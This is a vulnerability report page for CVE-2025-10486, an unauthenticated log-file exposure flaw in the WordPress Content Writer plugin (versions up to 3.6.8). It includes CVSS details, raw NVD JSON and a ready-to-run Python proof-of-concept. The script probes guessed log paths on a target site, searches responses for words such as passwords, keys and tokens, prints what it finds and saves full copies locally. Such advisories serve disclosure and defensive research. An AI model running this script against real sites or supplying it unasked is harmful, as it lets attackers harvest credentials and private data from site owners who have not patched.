Security Vulnerability Report
CVE-2025-10486 CVSS 5.3 MEDIUM

CVE-2025-10486

Published: 2025-10-15 09:15:41
Last Modified: 2026-04-15 00:35:42

Description

The Content Writer plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.6.8 through publicly exposed log files. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed log files.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WordPress Content Writer plugin <= 3.6.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-10486 PoC - Content Writer Plugin Sensitive Information Exposure
# This PoC demonstrates how an unauthenticated attacker can access exposed log files
import requests
import sys


def exploit(target_url):
    """
    Exploit for CVE-2025-10486: Sensitive Information Exposure in
    WordPress Content Writer Plugin (versions <= 3.6.8)
    """
    # Common log file paths for Content Writer plugin
    log_paths = [
        "/wp-content/plugins/content-writer/logs/debug.log",
        "/wp-content/plugins/content-writer/logs/error.log",
        "/wp-content/plugins/content-writer/logs/content-writer.log",
        "/wp-content/uploads/content-writer-logs/debug.log",
        "/wp-content/plugins/content-writer/debug.log",
        "/wp-content/plugins/content-writer/error.log",
        "/wp-content/plugins/content-writer/lib/logs/debug.log",
        "/wp-content/plugins/content-writer/lib/logs/error.log",
        "/wp-content/plugins/content-writer/includes/logs/debug.log",
    ]

    print(f"[*] Targeting: {target_url}")
    print("[*] CVE-2025-10486 - Content Writer Plugin Log File Exposure")
    print("-" * 60)

    found = False
    for path in log_paths:
        url = target_url.rstrip('/') + path
        try:
            response = requests.get(url, timeout=10, allow_redirects=False)
            if response.status_code == 200 and len(response.content) > 0:
                # Check if response contains log-like content
                content = response.text.lower()
                keywords = ['error', 'warning', 'debug', 'log', 'php',
                            'sql', 'password', 'key', 'token']
                if any(keyword in content for keyword in keywords):
                    print(f"[+] FOUND exposed log file: {url}")
                    print(f"[+] Status: {response.status_code}")
                    print(f"[+] Content-Length: {len(response.content)} bytes")
                    print("[+] First 500 chars of content:")
                    print("-" * 40)
                    print(response.text[:500])
                    print("-" * 40)
                    found = True

                    # Save full log content, named after the remote file
                    filename = path.split('/')[-1]
                    with open(f"exposed_{filename}", 'w') as f:
                        f.write(response.text)
                    print(f"[+] Full content saved to: exposed_{filename}")
        except requests.exceptions.RequestException:
            # Connection errors, timeouts etc. are ignored; move on to the next path
            pass

    if not found:
        print("[-] No exposed log files found at common paths.")
        print("[*] Try directory brute-forcing or check plugin documentation.")
    return found


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: python3 {sys.argv[0]} <target_url>")
        print(f"Example: python3 {sys.argv[0]} https://target-wordpress-site.com")
        sys.exit(1)
    target = sys.argv[1]
    exploit(target)
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10486", "sourceIdentifier": "[email protected]", "published": "2025-10-15T09:15:40.547", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Content Writer plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.6.8 through publicly exposed log files. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed log files."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-532"}]}], "references": [{"url": "https://plugins.svn.wordpress.org/content-writer/tags/3.6.8/lib/sc_functions.php", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3379612%40content-writer&new=3379612%40content-writer&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/content-writer/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bb20452b-7049-4567-8288-6d24350e2143?source=cve", "source": "[email protected]"}]}}